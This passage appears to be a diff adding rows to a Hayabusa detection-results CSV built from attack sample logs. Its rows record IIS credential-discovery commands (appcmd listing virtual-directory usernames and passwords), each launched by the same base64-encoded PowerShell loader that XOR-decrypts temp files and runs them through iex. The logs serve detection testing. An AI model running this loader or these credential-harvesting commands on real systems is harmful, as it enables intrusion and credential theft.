JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 168 | PGUID: 365ABB72-3D6F-5CEB-0000-00108FBFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.403 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2484 | PGUID: 365ABB72-3D6F-5CEB-0000-00104FC3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.473 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2168 | PGUID: 365ABB72-3D6F-5CEB-0000-00100FC7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.563 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3892 | PGUID: 365ABB72-3D6F-5CEB-0000-0010CFCAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.784 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3844 | PGUID: 365ABB72-3D6F-5CEB-0000-0010F2CFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:19.894 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQB